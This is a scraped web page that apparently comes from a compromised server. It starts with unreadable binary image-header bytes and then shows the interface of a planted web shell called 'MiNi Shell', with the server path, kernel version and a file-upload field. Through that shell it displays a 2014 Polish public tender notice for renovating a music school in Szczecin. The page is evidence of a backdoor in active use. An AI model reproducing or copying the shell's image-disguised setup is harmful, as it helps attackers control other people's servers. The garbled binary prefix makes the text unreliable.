JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140326/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140326/63903-N-2014.html

<p class="kh_header"><b>Szczecin: REMONT I MODERNIZACJA BUDYNKU ZESPOŁU SZKÓŁ MUZYCZNYCH PRZY UL. STAROMŁYŃSKIEJ 13 W SZCZECINIE - XIII ETAP</b><br>
<b>Numer ogłoszenia: 63903 - 2014; data zamieszczenia: 26.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Muzycznych im. Feliksa Nowowiejskiego , ul. Staromłyńska 13, 70-561 Szczecin, woj. zachodniopomorskie, tel. 91 48 81 356, faks 91 48 80 324.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsm2.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT I MODERNIZACJA BUDYNKU ZESPOŁU SZKÓŁ MUZYCZNYCH PRZY UL. STAROMŁYŃSKIEJ 13 W SZCZECINIE - XIII ETAP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia, objętym niniejszym postępowaniem są roboty budowlane  pn.  Remont i modernizacja budynku Zespołu Szkół Muzycznych przy ul. Staromłyńskiej 13 w Szczecinie - XIII etap. Etap XIII polega na remoncie i adaptacji pomieszczeń II piętra, części pomieszczeń I piętra oraz pomocniczej klatki schodowej.
Są to roboty: rozbiórki ścian i stropów, montaż zbrojenia, roboty betonowe, murowe, posadzkowe i wykończeniowe, montaż instalacji elektrycznych, sanitarnych, wentylacji mechanicznej i centralnego ogrzewania, automatycznej sygnalizacji pożaru, monitoringu wizyjnego, akustyki pomieszczeń, wykonanie ogrodzenia,  montaż stolarki drzwiowej i okiennej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.00.00.00-9, 45.11.13.00-1, 45.11.12.20-6, 45.26.21.00-2, 45.42.00.00-7, 45.41.00.00-4, 45.44.21.00-8, 45.30.00.00-3, 45.33.33.33-9, 45.40.00.00-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w niniejszym postępowaniu jest wniesienie wadium. Wysokość wymaganego wadium wynosi 35 000,00  zł (słownie: trzydzieści pięć tysięcy złotych).2.Zamawiający dopuszcza wniesienie wadium w jednej lub kilku następujących formach:a)poręczeniach bankowych;b)gwarancjach bankowych;
c)gwarancjach ubezpieczeniowych;d)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 09.11. 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.);
e)w pieniądzu wpłaconym przelewem na następujący rachunek bankowy:Bank NBP Okręgowy Oddział w Szczecinie  Nr rachunku: 36 1010 1599 0053 1113 9120 0000                  
z dopiskiem na przelewie Wadium w przetargu nieograniczonym na: Remont i  modernizację budynku Zespołu Szkół Muzycznych przy ul. Staromłyńskiej 13 w Szczecinie - XIII etap3.Wadium wniesione w pieniądzu będzie skuteczne, jeżeli w terminie do dnia  09.04.2014r. do  godz. 15 00 znajdzie się na rachunku, o którym mowa w ust. 2 lit. e) niniejszego działu.4.Wadium wnosi się na czas nie krótszy niż termin związania ofertą w niniejszym postępowaniu (stosownie do postanowień działu XII specyfikacji). Treść uprawnień Zamawiającego wynikająca z dokumentu wadium wniesionego w formach wskazanych w ust. 2 lit. a - d) musi umożliwiać wystąpienie Zamawiającemu z roszczeniem do poręczyciela lub gwaranta o wypłatę kwoty wadium w terminie związania ofertą w niniejszym postępowaniu.
5.Wykonawca traci na rzecz Zamawiającego wniesione wadium, jeżeli wezwany (stosownie do postanowień zawartych w dziale XIV ust. 5 specyfikacji do zawarcia umowy o wykonanie zamówienia objętego przedmiotem niniejszego postępowania odmówi podpisania umowy na warunkach określonych w jego ofercie lub zawarcie z nim takiej umowy stanie się niemożliwe z przyczyn leżących po jego stronie. 6.Z zastrzeżeniem wynikającym z postanowień ust. 5 niniejszego działu, Zamawiający zwróci Wykonawcy wniesione wadium na podstawie i na zasadach określonych w art. 46 ust. 1 - 4  PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi Wykaz wszystkich wykonanych robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - o wartości nie mniejszej niż 900 000 zł brutto każda. Zamawiający uzna za najważniejsze trzy roboty o wartości minimum 900 000 zł polegające na  robotach rodzajowo zgodnych z opisem przedmiotu niniejszego zamówienia, przy czym przynajmniej dwie z tych robót musi dotyczyć remontu lub modernizacji w obiekcie zabytkowym wpisanym do rejestru zabytków, w szczególności wykonania systemów akustycznych ścian i sufitów. Do Wykazu robót najważniejszych Wykonawca ma dołączyć dowody określające czy roboty te zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zakres informacji wymaganych do zamieszczenia w Wykazie wymieniony jest w Dziale VI ust. 1 pkt 1.2.
Zastosowanie ma również w ocenie warunków spełnienia udziału w postępowaniu zapis działu V ust. 3 w zakresie zachowania proporcji w odniesieniu do udziału innych podmiotów jakimi posłuży się Wykonawca przy realizacji zamówienia, tj. zamieszczenia na Wykazie stosownych pozycji odnoszących się do wykonanych robót przez wykonawcę i inny podmiot.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca wykaże, że dysponuje: osobami posiadającymi kwalifikacje zawodowe, doświadczenie i uprawnienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tekst jednolity: Dz. U. z 2010 r. nr 243, poz. 1623 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie wcześniejszych regulacji oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001 r. nr 5, poz. 42 z późn. zm.) a w szczególności osobami posiadającymi uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalnościach: 1.3.1. Kierownikiem robót w specjalności konstrukcyjno - budowlanej - jedna   osoba posiadająca następujące kwalifikacje zawodowe i doświadczenie:a)minimum 5 letnia praktyka zawodowa (liczona od daty uzyskania uprawnień budowlanych) w danej specjalności, przy czym pod pojęciem praktyki zawodowej Zamawiający rozumie okres czasu liczony od daty uzyskania uprawnień zawodowych do daty wszczęcia (ogłoszenia) niniejszego postępowania.
b)uprawnienia do kierowania robotami w obiektach zabytkowych, c)uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności konstrukcyjno - budowlanej, przy czym pod pojęciem pełnienia funkcji Zamawiający rozumie wykonanie lub wykonywanie (obecnie) danej funkcji.1.3.2. Kierownikiem robót w specjalności sanitarnej - jedna   osoba posiadająca następujące kwalifikacje zawodowe i doświadczenie:a)minimum 5 letnia praktyka zawodowa (liczona od daty uzyskania uprawnień budowlanych) w danej specjalności, przy czym pod pojęciem praktyki zawodowej Zamawiający rozumie okres czasu liczony od daty uzyskania uprawnień zawodowych do daty wszczęcia (ogłoszenia) niniejszego postępowania. b)uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności sanitarnej, przy czym pod pojęciem pełnienia funkcji Zamawiający rozumie wykonanie lub wykonywanie (obecnie) danej funkcji.
1.3.3. Kierownikiem robót w specjalności elektrycznej - jedna   osoba posiadająca następujące kwalifikacje zawodowe i doświadczenie: a)minimum 5 letnia praktyka zawodowa (liczona od daty uzyskania uprawnień budowlanych) w danej specjalności, przy czym pod pojęciem praktyki zawodowej Zamawiający rozumie okres czasu liczony od daty uzyskania uprawnień zawodowych do daty wszczęcia (ogłoszenia) niniejszego postępowania. b)uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności elektrycznej, przy czym pod pojęciem pełnienia funkcji Zamawiający rozumie wykonanie lub wykonywanie (obecnie) danej funkcji. Zamawiający uzna, że warunek ten zostanie spełniony, jeżeli Wykonawca przedłoży oświadczenie, że posiada aktualne dokumenty, o których mowa w Dziale VI ust.1 pkt 1.3.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten zostanie spełniony, jeżeli Wykonawca wykaże: posiadanie opłaconej polisy potwierdzającej, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość nie mniejszą niż 1 500 000 zł na cały okres realizacji zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz Ofertowy - Załącznik nr 1 do SIWZ.
Kosztorys ofertowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie i w granicach art. 144 ust. 1 PZP Zamawiający dopuszcza możliwość zmiany umowy o zamówienie zawartej w stosunku do treści ofert, na podstawie której dokonano wyboru Wykonawcy. Zmiana nastąpi w przypadkach i na warunkach określonych w § 12 wzoru umowy, a mianowicie; 1.Terminy wynikające z umowy, w tym terminy rozpoczęcia lub zakończenia robót budowlanych ustalone przez Strony w trybie i na warunkach określonych w § 2 umowy mogą ulec zmianie w następujących przypadkach: 1)Zachodzić będzie konieczność wykonania zamówień nie objętych Umową, których wykonanie stało się konieczne na skutek sytuacji niemożliwej do przewidzenia przez Wykonawcę na etapie wykonywania prac projektowych bądź robót budowlanych, a wykonanie zamówień objętych Umową będzie uzależnione od uprzedniego wykonania zamówień nieobjętych Umową;
2)Zachodzić będzie konieczność wykonania robót dodatkowych lub zastosowania materiałów zamiennych; 3)Niezawinionej przez Wykonawcę zwłoki Zamawiającego w przystąpieniu do dokonania odbiorów, przekazaniu Wykonawcy Terenu budowy i dokumentów, od których uzależniona jest możliwość wykonania obowiązków nałożonych Umową na Wykonawcę lub Zamawiającego; 4)Przerwania realizacji prac budowlanych przez właściwe organy administracji publicznej, bądź orzeczeniem sądu; 5)Przedłużających się z przyczyn niezawinionych przez Wykonawcę terminów postępowań przed organami administracji publicznej oraz sądami o wydanie decyzji niezbędnych do wykonania objętych Umową prac; 6)Opóźnień i niedotrzymania terminów wynikających z powodu Siły wyższej. 2.Określone w § 7 umowy Wynagrodzenie może ulec zmianie w następujących przypadkach: 1)Zmiany obowiązującej stawki podatku VAT; 2) Zachodzić będzie konieczność wykonania robót dodatkowych; 3)Zachodzić będzie konieczność wykonania robót zamiennych lub zastosowania materiałów zamiennych. Roboty zamienne należy rozumieć jako takie rozwiązania, które nie wykraczają poza przedmiot zamówienia a wprowadzają jedynie zmiany, które ulepszają realizowane zamówienie, usprawniają proces budowy bądź zamieniają prace i nakłady w danej kategorii CPV. 4)Zamawiający zleci wyłączenie części robót z zakresu umowy; 5)Nastąpi gwałtowna dekoniunktura na rynku materiałów i urządzeń niezbędnych do wykonania Umowy. 3.Niezależnie od postanowień ust. 1 i 2 przewiduje się możliwość zmiany postanowień Umowy w przypadku, gdy: 1)Nastąpi zmiana powszechnie lub miejscowo obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy; 2)Nastąpi zmiana formy zabezpieczenia należytego wykonania Umowy; 3)Wynikną rozbieżności lub niejasności w Umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy zgodnie z jej celem lub w celu jednoznacznej interpretacji jej zapisów przez Strony; 4)Wykonawca zechce zawrzeć umowę o podwykonawstwo na etapie realizacji umowy, w sytuacji gdy nie zadeklarował w swojej ofercie przetargowej realizacji zamówienia przy pomocy podwykonawców. Zmiana zakresu podwykonywanych robót może być uznana za nieistotną zmianę umowy w sprawie zamówienia, jeżeli Wykonawca samodzielnie spełniał warunki udziału w postępowaniu i w odniesieniu do tej części nie została wyłączona dopuszczalność podwykonawstwa; 4.Dopuszczalna będzie zmiana umowy wprowadzająca do umowy podwykonawstwo, w sytuacji w jakiej podwykonawstwo objęte zakresem niniejszego zamówienia nie zostało zgłoszone do oferty (dział X ust. 3 SIWZ). W takim przypadku warunki zmiany umowy o zamówienie określać będą odpowiednio postanowienia § 11 istotnych postanowień umowy z załącznika nr 7 SIWZ (odpowiednie wprowadzenie do umowy). 5.Dopuszczona zostanie również zmiana oznaczeń Stron oraz zmiana tekstu Umowy w zakresie niewskazanym w ust. 1 - 3, jeżeli zmiany nie będą miały wpływu na treść ustalonych w Umowie zobowiązań Stron. 6.Pod rygorem nieważności, zmiany i uzupełniania Umowy, o których mowa w ust. 1-4: 1)Mogą zostać dokonane wyłącznie na podstawie i w granicach art. 144 ust. 1 PZP; 2)Wymagają wprowadzenia poprzez zawarcie przez Strony w formie pisemnej aneksu do Umowy. 7.Zmiany Umowy z przyczyn wskazanych w ust. 1 - 2 zostaną wprowadzone w zakresie ustalonym negocjacjami Stron, z uwzględnieniem postanowień ust. 7 - 10. 8.Ocena wystąpienia wskazanej w ust. 1 pkt 1) podstawy zmiany Umowy zostanie dokonana z uwzględnieniem ryzyka Wykonawcy wynikającego ze ryczałtowej formy jego wynagrodzenia             (§ 7 umowy). 9.Podstawa zmiany wynagrodzenia z przyczyny wskazanej w ust. 2 pkt 1) może nastąpić wyłącznie o kwotę wynikającą ze zmiany stawki podatku VAT.
10.Podstawę zmiany ustalonego w Umowie Wynagrodzenia z przyczyn wskazanych w ust. 2 pkt 2) lub 3) w zakresie dotyczącym robót budowlanych stanowią wskazane w ofercie Wykonawcy dane do kosztorysowania tj.: 10.1 Stawki roboczogodziny kosztorysowej - ( zł) ; 10.2 Wskaźnika kosztów pośrednich (%) ; 10.3 Wskaźnika zysku - (%) . 10.4 W przypadku wystąpienia konieczności zastosowania materiałów zamiennych, ceny   tych materiałów należy  przyjąć wg średnich stawek Sekocenbudu za dany kwartał. 11.Podstawę zmiany ustalonego w Umowie Wynagrodzenia z przyczyn wskazanych w ust. 2  pkt 4) w zakresie dotyczącym robót budowlanych stanowią wskazane w Ofercie Wykonawcy dane do kosztorysowania, tj.: 11.1.Stawki roboczogodziny kosztorysowej -( zł); 11.2.Wskaźnika kosztów pośrednich -(%); 11.3.Wskaźnika zysku - (%) 11.4.Ceny jednostkowe materiałów z kosztorysu ofertowego 12.Niezależnie od postanowień ust. 9 Strony zgodnie ustalają, iż w przypadku zmniejszenia zakresu robót określonego w SIWZ, podstawę do pomniejszenia Wynagrodzenia stanowić może wartość robót, o które pomniejszono zakres robót, wyliczona na podstawie cen jednostkowych kosztorysu sporządzonego przez Wykonawcę na etapie projektowania. 13.Wszelkie zmiany umowy będą odbywały się w formie aneksów sporządzanych na piśmie za zgodą obydwu stron umowy, pod rygorem nieważności. Zamawiającemu służy roszczenie o zmianę umowy w przypadkach wskazanych w § 11 ust. 14 - 17 istotnych postanowień umowy z załącznika nr 7 SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsm2.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół szkół Muzycznych, ul. Staromłyńska 13, 70-561 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2014 godzina 15:00, miejsce: Zespół Szkół Muzycznych, ul. Staromłyńska 13, 70-561 Szczecin, pokój nr.1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com